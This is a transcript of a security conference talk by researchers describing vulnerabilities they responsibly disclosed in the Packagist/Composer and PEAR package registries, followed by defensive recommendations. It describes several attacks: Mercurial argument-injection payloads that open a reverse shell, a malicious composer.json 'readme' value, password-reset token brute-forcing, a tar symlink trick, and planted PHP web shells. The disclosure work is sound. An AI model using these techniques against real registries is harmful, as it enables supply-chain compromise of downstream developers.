Transcript
Hello, thank you for attending DevSecOps 2023. It's a real pleasure to be here. Today we have a talk called "Oops, there is somebody in my package manager, and somebody is us", and we'll show you how to get into package managers. If you're not familiar with the notion of a package manager: it's estimated that 92% of all commercial software uses open source components.
So you need a way to manage these components: a way to install them, to update them, even to list them so you are not missing any of them. This is what we call package managers. And usually there are specific package managers per ecosystem: PHP developers are going to have PHP package managers, and Rust developers will have a different one for all the Rust packages.
And today we're only going to focus on package managers for developers. If you know a bit about systems, you will know that on Ubuntu, for example, you may use dpkg or apt to pull system packages, but this is not what we're going to look at today, because it works slightly differently for software packages. Those are most of the time things like frontend libraries, backend APIs to interface with payment providers, any kind of things and features that you may need. And if you're a developer, you have probably already seen one of these logos: there is Python with pip, there is Ruby with RubyGems, there is PHP with PEAR and Composer. On the JavaScript side, there is Bower for the frontend, and Yarn and npm. There is even one for LaTeX, called MiKTeX. So there are plenty of package managers, one for every one of these small ecosystems.
And there is another notion that needs to be known, which is what we call the supply chain. It regroups all the processes, tools and software which are part of the life of a product. It's not only for software; it could be anything: if you have a physical product, shipping would be part of its supply chain. And as a result, software dependencies are only a small link, because if you push things really deep, even the laptop on which you're developing your software is part of its supply chain. So it's basically anything that touches your software that's part of its supply chain. A pretty famous xkcd drawing on the supply chain is this one. It displays something that's called "all modern digital infrastructure", made of small blocks stacked on top of each other. And one of the blocks that's really crucial for this modern infrastructure to work is a small block labeled "a project some random person in Nebraska has been thanklessly maintaining since 2003". In our case, this small project is going to be the backend servers behind package managers.
And these backend servers are necessary because when you install a package, you install it by name, and you need a way to tie this package name, this identifier (for instance, a name like vendor/package), to its location. It could be an HTTPS URL to some random server, it could be a GitHub repository that you need to clone, anything that the package manager supports. So if you compromise the backend server that makes this association, you're going to be able to change this association between the name and the destination, and attackers are going to be able to force you to download completely unintended archives and dependencies. This is likely to lead to the execution of arbitrary code, as you will run the code of this dependency at some point in time.
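To picture this association, here is a simplified sketch in the spirit of Composer-style repository metadata (the package name, URL and field selection are made up for illustration and are not taken from the talk):

```json
{
    "packages": {
        "some-vendor/stunning-waffle": [
            {
                "version": "dev-main",
                "source": {
                    "type": "git",
                    "url": "https://example.org/some-vendor/stunning-waffle.git",
                    "reference": "main"
                }
            }
        ]
    }
}
```

Whoever can rewrite the "source" entry controls what the package manager ends up cloning.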
So, time for a quick presentation: I'm going to be helped by Paul today. Paul is going to give the second half of the talk, and my name is Thomas; we're both vulnerability researchers in the Sonar research and development team. We help drive innovation by finding zero-days in popular open source software. And if you don't know Sonar, our mission is to enable developers to write clean code, meaning code that is free of functional bugs and security vulnerabilities. You probably know one of our products: we have SonarQube doing this analysis on premise, SonarCloud doing it in the cloud, and SonarLint doing it in your code editor.
And for today, we're going to show you the results of research on the security of package managers and their backend servers for the PHP ecosystem, because that's the one for which we have the most interesting results. We're going to start by taking over Packagist, which is the main repository behind Composer, the most popular package manager for PHP. We did it twice, so we're going to show you how we did it. We're then going to present how we did it for PEAR, and we're going to try to give a few insights on how to reduce the impact of these attacks and try to prevent them in the future.
So let's start by looking at Composer and Packagist. Composer is the most popular PHP package manager. It's used by virtually any company running PHP somewhere: if you have a PHP application somewhere, you're probably using Composer to fetch, install and update all of its required dependencies. And it's using a central registry, which, like we said, ties the name and the location of the packages; this registry is called Packagist. Both projects, Composer and Packagist, are open source and written in PHP, and the public instance is maintained by a company called Private Packagist, which provides private package hosting.
And to try to give a very rough estimate of Composer's reach (this is very unscientific, don't do it at home, it's just to give an idea of how popular this is): it's kind of known that PHP is behind 78% of the Internet, which is still a lot, even if its popularity has kind of decreased for some time. It's not really dead. WordPress alone is 43% of that, and Composer is not required to run it, so we have to remove this 43% from the 78%. We also did an estimation of how many PHP projects use Composer, and we found something like 70%. So we can say that maybe a total of 20% of web servers are running Composer in one way or another. And this small graph comes from the official Packagist statistics: we can see that 2 billion packages are downloaded from Packagist every month. So these package managers still see pretty heavy use; even if everybody tries to tell you that PHP is dead, that's really not the case.
In the past years, we managed to compromise Packagist, this backend server, twice: the first time in April 2021, and the second time in April 2022, a year later. These two CVEs are two very similar vulnerabilities that we found in Composer. We discovered them and responsibly reported them to the maintainers of Composer and Packagist. So let's dive into it.
First thing: when you get to the Packagist interface, you're going to see this small page to submit a new package. It's really simple: there is only one field, where you put the URL of your package, and then you run "Check". It's going to check whether this is indeed a Composer package with the right format and the right manifest file, and then it's going to try to import it into the package registry. Afterward, any developer is going to be able to install this package and use it like any other. And to do this import, to clone this repository, Packagist is going to reuse Composer for most of these operations. It's going to check whether the project contains a file called composer.json, which is the manifest, and it's also going to clone this repository, parse the manifest, create it in the database, and add the right metadata files. So the next time somebody runs Composer, they will be able to find this package and download the right source.
And when we say that the remote repository is cloned, it's done with the logic that's already implemented in Composer; they use Composer as a library to not have to implement it again. And for every single supported version control implementation (it could be Mercurial, it could be Git, it could be Subversion), it will check if it's a known host, because if the URL points to GitHub, it's always going to use Git, since they know how it's hosted. For the other ones they have similar tricks. Then: does the URL match the expected format? Is there something missing? Is the ".git" missing at the end, or is it already present? So there are some small logic checks in there, and then it does some further verification on the remote end.
And to avoid implementing everything in PHP, because that would require understanding how all these protocols work, and it's already done by the binaries that we are all using, they simply run git ls-remote with the URL that you just provided. Same with Subversion: they run svn info with the URL you just provided. And same with hg, which is the Mercurial client.
And if you look at these lines of code, there is something called ProcessExecutor::escape. It's an escape function, and the role of this escape function is to prevent command injection vulnerabilities. If you're not familiar with command injection vulnerabilities, I'm going to quickly explain them, and it's going to be really useful for what's coming next. In this case (it's pseudocode, don't worry about the syntax), we put this weird sequence, a dollar sign and parentheses around "date", into the controlled variable. In shell script, this dollar-parentheses sequence is going to execute what's within the parentheses, in this case date, and put the result as a string into the current command. So if you execute it, the shell is going to see "hg identify" followed by our sequence, recognize this command substitution sequence, execute it first, and then the resulting string will be used in the final command: it's going to run something like "hg identify Tuesday, August 2". It's pretty unsafe, because date could have been anything else; it could have been "rm -rf *" to remove everything from the file system. So to prevent that kind of command injection, you need to use escape functions. This escape function will surround the data with single quotes, so the shell will see it as a string literal and not as something it should try to evaluate. In that case: "hg identify" and, between single quotes, our injection. It's going to just run "hg identify" with one string argument, and the date command wouldn't be executed.
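To make the difference concrete, here is a minimal PHP sketch of both behaviours, using the standard escapeshellarg() as a stand-in for Composer's ProcessExecutor::escape (the variable name and command are illustrative):

```php
<?php
// Attacker-controlled value containing a command substitution sequence.
$url = '$(date)';

// Unsafe: the shell evaluates $(date) first, so whatever is inside the
// parentheses runs before `hg identify` is even invoked.
shell_exec('hg identify ' . $url);

// Safer: the value is wrapped in single quotes, so the shell passes it on as a
// literal string and never evaluates the $() sequence.
shell_exec('hg identify ' . escapeshellarg($url));
```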
But what happens if I try to put something like an option instead? Can I maybe inject arguments? In that case, the shell is going to run "hg identify '--help'", and yes, it's going to pass the argument --help to identify: if you trace it on the shell side, the single quotes don't matter, because the shell removes them and makes the call correctly with three words, hg, identify, and --help. And something interesting here: displaying the help is not so useful as an attacker. But if you start looking through the Mercurial manual, you will see that it's possible to create aliases with the same name as existing commands, which can override the original definition. That means that just by passing an extra argument, we can already change the behavior of existing commands, which is already pretty nice. The manual also says that an alias can start with an exclamation point to make it a shell alias, and this would allow us to execute shell commands instead of identify. So with a payload like --config=alias.identify= followed by an exclamation point, we can put basically any shell command. If we try to import a new URL of the form --config=alias.identify=!<command>, it's going to execute arbitrary commands on the Packagist instance. And as a result, we would be able to change any software dependency that's hosted on the server.
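A minimal sketch of that argument injection, again with escapeshellarg() standing in for Composer's escaping and a hypothetical payload that follows the alias trick described above:

```php
<?php
// Properly quoted, so no command injection. But the value is shaped like an
// option, and the shell strips the quotes before hg ever sees it.
$url = '--config=alias.identify=!id';

// hg receives: identify --config=alias.identify=!id
// The --config option redefines `identify` as a shell alias ("!"), so instead
// of the real identify command, Mercurial runs `id`.
shell_exec('hg identify ' . escapeshellarg($url));
```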
That's something we reported, and it was fixed in April 2021. So let's look at it. Let's start by showing how we set up this test instance. This terminal is root on a virtual machine at this IP address, which we can ping from Alice's machine; Alice is the attacker. So when we go to our local Packagist domain, or to this IP address, we reach the test instance, not the real one. Now Alice can go to this interface and register as "attacker", like any other developer could. And now she can go to the submit section and put in the payload we just showed you: this --config=alias.identify= followed by a shell command. In this case, the shell command is going to be netcat, and we're going to pipe all of netcat's input and output to bash, which is going to grant Alice a remote shell on this host. So we listen for the connection to come back to us, we run "Check", and now if we type commands like id, we see that we run under the www-data identity. This is not very interactive, so now Alice can use Python to get an interactive shell; in this prompt, this is what's happening. And now, as we see, we have a real shell.
Now let's authenticate as Thomas. So this is me, I'm a developer, and I'm hosting an awesome package called stunning-waffle on Packagist, on this test instance. As we can see, there is only one version of this package, one release on dev-main. So if I want to use it as a developer, I would type composer require, my username and then the name of this package, and it just works; now I can use it. It simply displays some emojis: waffles, sparkles and a cook. And that's great, it's what I intended to have, and that's why my package exists. But now, at the same time, Alice, with the interactive shell she just obtained, can go and try to modify the association between the name of my package, stunning-waffle, and its source. In that case, the source is a Git repository. So if we change this JSON file and make it point somewhere else, the next time somebody runs composer update or composer require, this arbitrary destination is what will be fetched. So Alice can simply take a JSON file that was modified beforehand and replace the one on the server with the crafted one. Now it's been replaced, and the next time somebody types composer update, we see that there is an update. As a developer, I did not push this update, so something odd happened. And if I run my main PHP file again, maybe something else will happen.
Now let's look at how they chose to fix it. The only official way to fix such vulnerabilities is to use a dash-dash ("--") sequence. It may look a bit weird, but in the end it's part of the POSIX specification, and for any POSIX-compliant argument parser, when it first encounters this separator, it has to ignore all the arguments that come next: they should be treated as operands and not as options. So if you create a file called "--help" and you try to run "ls --help", it's not going to list it, because --help is going to be treated as an option. But if you then run "ls -- --help", it's going to work, thanks to the support for this special argument.
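Applied to the invocation from the previous sketch, the fix boils down to adding the separator before the user-controlled value (again a sketch, not Composer's literal code):

```php
<?php
// Same attacker-controlled value as before.
$url = '--config=alias.identify=!id';

// With the `--` end-of-options marker, a POSIX-style parser treats everything
// after it as an operand, so the value is handled as a repository location and
// the alias option is never parsed.
shell_exec('hg identify -- ' . escapeshellarg($url));
```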
And the timeline is really cool in this case. When you report security vulnerabilities, you really want to get them fixed, and most of the time, when it's so critical, you can't wait; you're just syncing your mail several times a day just to make sure you did not miss a response. In this case, we notified security@packagist.org at 01:00 a.m., and at 10:00 a.m. they released a hotfix on the public instance. That means that nobody could exploit it anymore, for real, even if somebody already knew the vulnerability. A few days after, they released a patched version, an official patch for Composer and therefore also for Packagist, and they published an official announcement the same day. And one year later, we were like: okay, did we miss something? Is there anything left on Packagist? So let's try to identify a new vulnerability in Packagist, just for fun. A good thing is that we were already familiar with this code base: we had already paid the initial cost of entry of approaching a new target, we had already contributed to the patch, and we had looked for bypasses. That means that we came back with the same set of assumptions and biases, but maybe there was still something.
So what did we miss? First thing: we already knew about the VCS drivers. They are wrappers around every version control command that's being run, so the Git commands, the Subversion commands, the Mercurial commands, and this is where the first vulnerability happened, because they have to invoke third-party external commands. That's really risky, because you can introduce command injections or argument injections, so it's still a target of choice for similar bugs. And is there any invocation left without the dash-dash, one that could maybe be vulnerable to argument injection? When reviewing this code, we noticed a few calls without this dash-dash, so at risk of argument injection, and one of them looked really familiar, because we had tried to send a patch to correct these lines. But in fact it was removed from our suggestions: they explicitly removed these two dashes for the Git and for the Mercurial invocations, saying that they removed the fix because it was breaking a feature. The culprit is a function called getFileContent. This getFileContent, in every wrapper around Git, Mercurial or Subversion, allows reading a file's content from the repository. So when you clone the repository, you don't need to have the working tree; you can clone a bare repository and then call this getFileContent, which will call the right version control subcommand to get the file's content.
And you can also get the file content at different revisions: it could be on the main branch, or on some old historical branch, or on a docs branch. Now, when you run git show with the end-of-options marker, the two dashes, it breaks, because in this command the argument has a special meaning that's different from the one in the POSIX specification: its goal is to separate revisions from paths. If we run "git show @:composer.json" (@ being the current HEAD), we get the content of composer.json. But if we add the two dashes, which should work per the POSIX specification, there is nothing; it's just not working as intended. So that's why they removed this dash-dash.
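As a rough sketch, a getFileContent-style helper for Git ends up executing something like this (simplified; the function name and structure are ours, not Composer's literal code):

```php
<?php
// Reading a file at a given revision is done with `git show <revision>:<path>`.
function getFileContentSketch(string $identifier, string $file): ?string
{
    // Works: `git show '@:composer.json'` prints the file at that revision.
    // With a `--` in front of the argument, git stops interpreting it as a
    // <revision>:<path> spec and treats it as a plain path, so the content is
    // no longer returned. That is why the separator had been removed here.
    return shell_exec('git show ' . escapeshellarg($identifier . ':' . $file));
}
```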
And the thing is, the arguments for the calls to this getFileContent, for example when the README is being updated for display on the Packagist interface, come from composer.json, so they come from the manifest. The manifest can have a key called "readme" to point to a different README than README.txt or README.md; it could be docs/README.md, and it also works as long as it's part of the manifest, in the readme key. And in the Mercurial driver, this value goes straight into the invocation. It is escaped, so it's safe against command injection, but it's not safe against argument injection. So we have the exact same scenario as in the first vulnerability: we can add extra arguments to the Mercurial invocation. To exploit it, we would need to create a project in a remote Mercurial repository, set a malicious readme key in composer.json, and then import the package on Packagist. We could use this vulnerability to write an arbitrary file, an arbitrary PHP script, to /var/www/packagist, so under the web root, and then maybe try to use it to execute arbitrary PHP code, resulting in the same exploitation and the same impact as the first vulnerability research we presented earlier. So in composer.json, the readme key would contain something like the usual --config=alias... payload. This time it's a cat command, so we override cat and not identify, and we put the exclamation point to say it's a shell alias. Then, since this repository is cloned as bare, we cannot just read payload.sh from the local file system, so we use hg, the Mercurial client, to read the content of a file called payload.sh and pipe it to the shell to execute it. And then there is a mandatory suffix, ".txt", to reach the right code path on Packagist, so that it executes when we trigger the update.
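Schematically, such a manifest could look like this (a hypothetical reconstruction for illustration only: the package name is made up and the readme value is abridged, not the exact payload used in the research):

```json
{
    "name": "attacker/innocent-package",
    "description": "Looks like a perfectly normal package",
    "readme": "--config=alias.cat=!hg cat payload.sh | sh ... .txt"
}
```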
Let's see what it looked like. The setup is roughly the same, but this time we need to host our repository somewhere, so I chose SourceHut, because it is one of the only few Mercurial hosting services left for free on the Internet. On the right I have two windows; these are root shells on the Packagist test instance, and I'm checking whether the file main.php in the web root and the file /tmp/pwned were created or not. For now, they still don't exist. So we're going to take the public URL of this repo and import it into Packagist. In this repo we put a composer.json with a readme key that should remind you of something, because this is the payload we just presented: it's going to run payload.sh, which writes the output of the command id into /tmp/pwned and drops the file main.php under the web root. And main.php is simply a PHP script that will execute any command that we put into the cmd parameter. So now let's log in and try to import it. We have a user account, and we simply put in the public URL of our Mercurial repository. We submit it, and the import happens as for any other repository; nothing goes wrong for now. But as soon as we click update, we reach the code path that was discussed earlier. When the job succeeds, workers start to process all the imports, and as we see on the right, we have the output of the command id in /tmp/pwned, and we now have something in main.php under the web root. And if we go directly to this file and try to execute arbitrary commands like ls, we see that we get the output, and obviously with id we get the same. And now we could do the same as in the first demonstration, which is backdooring Packagist by modifying the JSON files of the package metadata.
Now we can look at the timeline of this bug. We first reported it on April 7 at 06:00 p.m., which is a much better working hour. Then we got an acknowledgment about an hour later, so pretty quick; we knew that they would be working on a hotfix right away. They deployed the hotfix on the official Packagist instance the day after, which is also the most important part: at least nobody could exploit it on the instance that's used by basically everybody. A few days after, they assigned a CVE and made an official announcement to say that they did not identify any trace of exploitation on the public instance, except us. They also released new Composer versions with the patch, to protect everybody who was using this feature of Composer. It was not really easy to fix it elegantly, because this is an argument they could not put a "--" in front of without breaking the revision syntax we just saw, so they simply rejected any branch name that starts with a dash. It's not perfect, but at least it's pretty effective. So now Paul is going to guide you through similar vulnerabilities in another software package manager for PHP, called PEAR.
Okay then, let's look at PEAR now. First of all, what is PEAR? PEAR stands for PHP Extension and Application Repository, and it is the historical package manager of the PHP ecosystem. It was created in 1999, so it's quite old now, and today it's only moderately active anymore. Since its beginning it has served almost 300 million package downloads, and nowadays there are roughly 50 popular packages that are still being actively developed and published on PEAR; among them are names like PEAR itself, Console_Getopt, Net_SMTP, and Archive_Tar.
First of all, before we look into the vulnerabilities of PEAR, or before we even start to search for them, we have to think about the attack surface. One big difference between Packagist and PEAR is that for PEAR, administrators have to manually validate all new accounts. So how do we get an account? Well, we don't. We could try to trick an admin into accepting us, but we want to focus on the technical side and not trick people into something. So we have to start with the pre-authentication attack surface. This includes all the features that you can use before you even log in, and there are some features like that in PEAR. A historical package manager also probably means that it was built with historical best practices in mind, practices that are nowadays considered deprecated, and it also has to support older PHP versions. With this attack surface in mind, we started, and we did what we always do when we start a new research project: we use our own tool, SonarQube, to scan the code of the target. SonarQube is a static analysis tool, so it will look through the code and find dangerous places, for example where user input lands in a dangerous function, or where certain functions are used in a bad way, or in general where functions that are considered dangerous are used. In this case, it gave us an issue about pseudorandom number generators, saying that an unsafe one is being used. You can see it down below: the function is mt_rand, and it is used in the reset password function. And this is very interesting already, because this is exactly one of those features that can be used before you log in: if you lose your password, if you forget it, then you might want to reset it, and to do this you can't log in. So this is already pre-authentication attack surface. So we dug a little bit deeper into what happens here. What a reset password function usually does is generate a random token and email it to the user, so the user can click on a reset link and then set a new password. This function also does this.
And the way it's done is like this: it takes four different values, combines them, and then hashes them with MD5, and the result is the random token. But some of these values are easily predictable or known by the attacker. The first part is a random number; this is the pseudorandom number generator function that was flagged here, and the two arguments don't mean the length of the number, they are the interval. So this function will only generate one of ten values, between 4 and 13, which is not a lot and easily guessable. The second part is the username of the account whose password should be reset, so this also comes from the request and is attacker-controlled. The third part is the server's local time at the moment of the request. This might not seem so easily predictable, but the server always sends back a Date header in its HTTP response that contains the local time. And the last thing is the new password that you want to set, because for PEAR the password reset works like this: during the reset you already give your new password, and once you get the link, you basically confirm that this is the new password. So, as I said, the last three things are either directly controlled or can be known by the attacker, and only the first value is really random. But it can only take values between 4 and 13, so it's also very easily guessable. And with that, we can reset about any account's password on PEAR.
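Here is a minimal PHP sketch of the token scheme as described above and of the brute force against it; the function names and the exact concatenation order are ours, not PEAR's literal code:

```php
<?php
// Sketch of the reset-token scheme described in the talk (illustrative only).
function makeResetToken(string $user, int $time, string $newPassword): string
{
    $random = mt_rand(4, 13);                   // only 10 possible values
    return md5($random . $user . $time . $newPassword);
}

// Attacker side: everything except the small random number is known or chosen.
// $serverTime comes from the Date header of the HTTP response, $user and
// $newPassword are picked by the attacker.
function guessTokens(string $user, int $serverTime, string $newPassword): array
{
    $candidates = [];
    foreach (range(4, 13) as $random) {
        // Allow the observed clock to be a few seconds off.
        foreach (range($serverTime - 2, $serverTime + 2) as $time) {
            $candidates[] = md5($random . $user . $time . $newPassword);
        }
    }
    return $candidates;                         // roughly 50 guesses
}
```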
So, to sum up where we stand right now: we can take over any account with about 50 tries. Sometimes we have to guess a little bit more, if the timestamp is a few seconds off, or if we don't know the time zone and have to try it out, but 50 tries should be enough for any account. It's also very interesting because PEAR accounts are public: for a specific package, you know which user published it, and you only need their username, not their email, to reset the password. So what we could do is find popular packages, target their developers, and then release a new version of that package with maybe a backdoor built in. What's also very interesting about this bug is that it was 15 years old when it was discovered. The bug had been in the reset password function since this function was written for the first time, so really a long time during which people could have abused it if they had found it. But we didn't want to stop there. Taking over every developer's account creates a lot of noise, and people could get suspicious and block the attempt, or clean up after the attacker if they notice it. So, is it possible to gain code execution on the servers and replace all the packages in a more stealthy way? This is what we wanted to find out.
So we went ahead and looked at what we could do now that we have new attack surface, because now we have an account and can use more features than before. We can see that packages that are submitted, new ones or updates, are added to a work queue, where asynchronous workers will then process them and eventually publish them. This processing works like this: at first the package is extracted and validated, and afterward the documentation is generated using the phpDocumentor tool. Finally, the documentation and the package download are copied to the package page, where you can now see the package's README and documentation and can download the package. And this also sounds really interesting: the extraction process and the documentation generation sound quite complex, with a lot of file system handling and also this external tool, so a lot of complexity where things can go wrong. So we looked into the code to see how all of this works. First, here's the code that extracts the file: when you upload a package, you have to do it in the tar archive file format, and then this file is extracted with the Archive_Tar package into a temporary directory.
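In code, this step boils down to something like the following (a simplified sketch, not PEAR's exact code; paths and variable names are made up):

```php
<?php
require_once 'Archive/Tar.php';

// The uploaded archive is opened with Archive_Tar and unpacked into a
// temporary directory before validation and documentation generation.
$upload  = '/tmp/uploads/my-package-1.0.0.tar';
$workDir = '/tmp/extract/my-package-1.0.0';

$tar = new Archive_Tar($upload);
$tar->extract($workDir);
```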
Then we had a look at the version of this Archive_Tar package that was being used, and we noticed that it was slightly out of date: they used version 1.4.7. At that point we looked up whether there was a known vulnerability in it, and in fact there was: CVE-2020-36193. We read the description to see what exactly this vulnerability was about: it allows write operations with directory traversal due to inadequate checking of symbolic links. And it gets more and more interesting with this, because for once we now know that directory traversal has to be used and that it has to do with symbolic links, but also, writing files somewhere is very, very powerful in the PHP ecosystem: once you can write a PHP file with controlled content to the web root of a server, you can basically just browse there and the server will happily execute your code for you, and then you can do about everything that the server could do. So, to find out exactly how this vulnerability has to be abused, we checked the patch for the vulnerability. This is a very common technique: just look at the patch and see what was changed, and then you know exactly what is now prevented and therefore what was previously possible. In this case, the patch added these few lines, which add another check: whenever an archive is extracted and contains an element that is a symbolic link (type 2 in terms of the tar format), it will check whether the symbolic link points inside the extraction directory or outside of it. If it points outside, it will be blocked and an error will be displayed instead, because this is now forbidden.
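The idea behind such a check can be sketched like this (our own simplified version, not the literal Archive_Tar patch):

```php
<?php
// Before creating a symlink entry, make sure its target stays inside the
// extraction directory.
function symlinkStaysInside(string $entryPath, string $linkTarget, string $extractDir): bool
{
    $base = rtrim($extractDir, '/');

    // Resolve the target relative to the directory containing the link,
    // unless it is already absolute.
    $target = str_starts_with($linkTarget, '/')
        ? $linkTarget
        : dirname($base . '/' . $entryPath) . '/' . $linkTarget;

    // Normalize '.' and '..' segments without touching the filesystem.
    $parts = [];
    foreach (explode('/', $target) as $segment) {
        if ($segment === '' || $segment === '.') {
            continue;
        }
        if ($segment === '..') {
            array_pop($parts);
            continue;
        }
        $parts[] = $segment;
    }
    $normalized = '/' . implode('/', $parts);

    // Accept only targets that remain under the extraction directory.
    return str_starts_with($normalized . '/', $base . '/');
}
```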
With this, we knew that we somehow had to use a symbolic link that points somewhere else. But symbolic links by themselves are not really dangerous; a link is only a pointer, so we still have to write through it somehow. To do that, we crafted our own tar archive file, and it looks like this. The first element in the archive is a symbolic link called "symlink"; it points to the web root and then to the file evil.php inside this web root. The next item in the tar archive is a regular file: as you can see, it has 49 bytes of content, so there's some content in it, but it is also called "symlink". And then lastly we have package.xml, which is a file that's needed by PEAR to do some more validation on the package. If such a tar file is now extracted with the Archive_Tar package, the following happens. What you can see here is a rough approximation of the file system of the PEAR server. At the top you have the web root, called public_html; it contains, for example, an index.php file and other files that are reachable via the web. Below that you have temporary directories: one of them is used for the actual uploads, so the tar files, and the bottom one is used to extract those tar files. In this case, our package is called "mypackage", and it gets extracted. First, the first element is extracted. This is the symbolic link called "symlink"; it points to evil.php in the web root, but the file evil.php does not exist yet; only the link exists. Next, the second item is extracted, and this is the regular file that is also called "symlink". This causes the system to write to the file called "symlink", but because that path is (or rather was) a symbolic link, it writes to where the symbolic link points, and not directly to the location where it sits. So this causes the file evil.php in the web root to be created, and the content is arbitrary; the attacker can completely choose it. In this case it's a simple PHP script that executes, as a system command, a command given via a GET parameter. And then finally the package.xml file is also extracted, but for the exploit this is not really important anymore.
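The core file system effect can be reproduced locally with a few lines of PHP (an illustration of the mechanism only, independent of Archive_Tar; the paths are made up):

```php
<?php
$extractDir = '/tmp/extract-demo';
if (!is_dir($extractDir)) {
    mkdir($extractDir, 0777, true);
}

// Step 1: the "symlink" entry is created, pointing at a not-yet-existing file
// under the web root.
symlink('/var/www/public_html/evil.php', $extractDir . '/symlink');

// Step 2: the regular entry with the same name is written. Because that path
// is a symbolic link, the data lands at the link's target, inside the web root.
file_put_contents($extractDir . '/symlink', "<?php system(\$_GET['cmd'] ?? ''); ?>");
```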
So let's put the pieces together. We chained both of the bugs: first, take over an administrator's account with the reset password functionality; then use these new privileges to create a new package and automatically approve it, so that it gets added to the work queue and extracted; and during this extraction, the known CVE exploit in Archive_Tar leads to the file write. Finally, our own PHP script lands in the web root and we can just execute it. And with that, we can compromise all the PEAR packages with very little noise. And yeah, that's basically the end of the journey on the backend side, because there's not much more room for lateral movement on the server that hosts PEAR; there's only other stuff related to PEAR being hosted there. So we could, for example, compromise the PEAR installers. But the really interesting thing for a real attacker would now be to backdoor all the packages, then wait until people install them, move into their networks and install malware there. So, to show it all, we now have a small demonstration of how to get a shell on the PEAR server.
have the same setup. We have a test instance of peer on the left,
which is Austin on the vm with ip addresses on the screen
below. This is just test one. Again not real
production instance. And to make our life easier for the demonstration,
we're going to start a cron job every 5 seconds on the wheel instance.
It would I think take up to a day, but we don't want
to wait for a day for a demonstration, so it's going to be quicker that
way. So we know there is the admin account, but we
don't know its password. So we can use the exploit to
first fetch date of the server hands, try to
bridge force, the only few reset
tokens that may exist at that time. So we do a password
reset request and then we use this date
to try to guess there is a token and
change the password. And now we see it succeeded and we can log in
as admin and FuBaR. And this is super user. This is really cool.
We can already start releasing backdrop releases for everybody,
but we'll show you the second
exploits that we found. So we create the malicious archive
with two sim links. First sim link as a link, then sim link as a
file, and then finally the package XML. We upload it and
when it's done we see that the crown will trigger and
it will write the evil PhP file under the web root.
And if we access this file with the right parameter, we can
execute arbitrary commands like id or your name.
Okay, now let's have a quick look at the timeline of this disclosure. We reported this in the summer of last year to the PEAR maintainers, and a few days after, they pushed commits to their GitHub repository that fixed the issue. But then it unfortunately took some months until these fixes were actually deployed to the PEAR instance. In this timeframe, people could have seen that there is a fix for a vulnerability, seen what it is, and tried out whether it had already been deployed on the server. Fortunately, to our knowledge, this did not happen. But it's always best if the fix and the deployment of the fix happen as quickly as possible, one after the other. If you can, you could also consider moving to Composer, because packages that are on PEAR are often also present on Composer, at least the very popular ones. And Composer and Packagist have a far more active community and support, and as we've seen, they are able to patch faster.
Now let's take a step back and think about how we could prevent these attacks in general. First of all, we have to admit that our ecosystems are not robust against these attacks. And this is not only a PHP problem: in most ecosystems, these central components are built by volunteers and also maintained and operated by volunteers. So there can be bugs in there, and you can't really blame anybody if they do it in their free time, right? So in order to fix this, we want to focus on two actionable ideas that could help prevent these attacks. First, we can reduce the impact by doing mandatory code signing of software artifacts. And secondly, we can reduce the risk by applying all the security best practices.
the security best practices. For the first
part, the impact reduction,
we want to have code signing because in
fact package managers don't have to be trusted. In the end
they are just simple tubes, a tunnel that you reach through
to get what you want. And you don't want to
have to trust this, you only want to trust the
thing that you are getting. So if the thing you
are getting the artifact that you download is signed by the developer
that wrote it. Then you
only have to trust this developer's identity.
And you get the identity via OSDC providers or
via GPG keys, something like this. So that you can
check the cryptographic signature of
the thing you download. And if the signature is correct,
then you know that it comes really from this developer.
And then you only have to trust the developer and not the developer and the
package manager. So this would already avoid
many attacks on the package manager platforms.
The worst thing that could happen now is you can't
get a package because it's backdoor. But since you know that it's backdoor,
because the signature doesn't match, you can just discard it and not
use it. But all of this only works
if it's mandatory. Otherwise there will always be holes
in the system. For example, if package a is
signed, then you would notice if it's being manipulated.
But if package a depends on package b, and this package b
is not signed, then you can't really use package
a because you would have to download both of them in order to use the
whole thing. But since you can control or
check if package b is
really the thing that the developer wrote.
Yeah, the whole code signing thing doesn't work anymore, so it has
to be mandatory.
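To illustrate what a client-side check could look like, here is a minimal sketch of verifying a detached Ed25519 signature over a downloaded artifact with PHP's bundled libsodium functions; this is our own illustration, not the verification flow of any specific package manager:

```php
<?php
// The developer's public key is assumed to be obtained through a trusted
// channel (for example, bound to their identity by an identity provider).
function isArtifactTrusted(string $artifactPath, string $signature, string $publicKey): bool
{
    $artifact = (string) file_get_contents($artifactPath);

    // Ed25519 detached signature check via libsodium (bundled since PHP 7.2).
    return sodium_crypto_sign_verify_detached($signature, $artifact, $publicKey);
}

// Hypothetical usage: only install the package if the signature matches.
// if (!isArtifactTrusted('stunning-waffle.tar', $sig, $developerPublicKey)) {
//     exit('Signature mismatch: discarding the artifact.');
// }
```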
One project that wants to tackle this is Sigstore. Sigstore is basically a public, append-only ledger where the signatures of all the artifacts of all the packages are published. To sign the packages, only ephemeral keys are used, just for the signing, and then the signature is stored. It's kind of similar to TLS certificate transparency, where there are already these kinds of append-only public ledgers in which certificate authorities publish all of the certificates that they issue. So you can watch there and see if some CA is issuing a certificate for your domain that it's not supposed to issue, and then you can intervene. Sigstore also has protection against downgrade attacks, which is also very good for the security of the whole system. And suddenly, if you use Sigstore, and if Sigstore were integrated into your ecosystem of choice, you would only have to trust the identity providers and not the ecosystem itself. And since the identity providers are usually big companies such as GitHub or Google, you know that they have much more money and people to make sure that their systems are safe and not breached, and that they really only hand out those identities to the people they should.
The second part is code security: applying code security best practices. Most backend services of these package managers are open source. There are some exceptions to this rule; for npm, for example, only the client is open source, not the backend. And you might think, as with all open source software: yeah, open source is nice, and that is true. But you also might think: okay, it's open source, so surely some people have already looked at the code and made sure it's safe. But did somebody really do that? You don't really know. So who's auditing all this open source software? We do it, but we can't audit all of it. Code reviews take time, and they require money if you want to hire somebody to do them, and also paperwork and all this organizational stuff. So can some random open source project really come to a company and say: please audit our code? There are also bug bounty programs such as the Internet Bug Bounty, and this particular one is supposed to pay out bug bounties to researchers who find vulnerabilities in popular software that's used all over the Internet. But, for example, they didn't accept the bugs we presented today. So who would do it, if not them? So there's maybe not that good of an incentive for other researchers to do it. And speaking of other researchers, we only know of fewer than ten people in general who publish bugs in these targets, in package managers. That's really a small group of people who, even if they wanted to, would have a hard time covering all of the code that is part of these ecosystems. And finally, we, as outsiders, don't have access to the infrastructure. We can only look at the code in the form that it's published, for example on GitHub, set it up ourselves, and see if there's a vulnerability in there. But we don't really know how the production system is set up, and we can't see if there's a misconfiguration or other issues that can only be found by looking at the actual system.
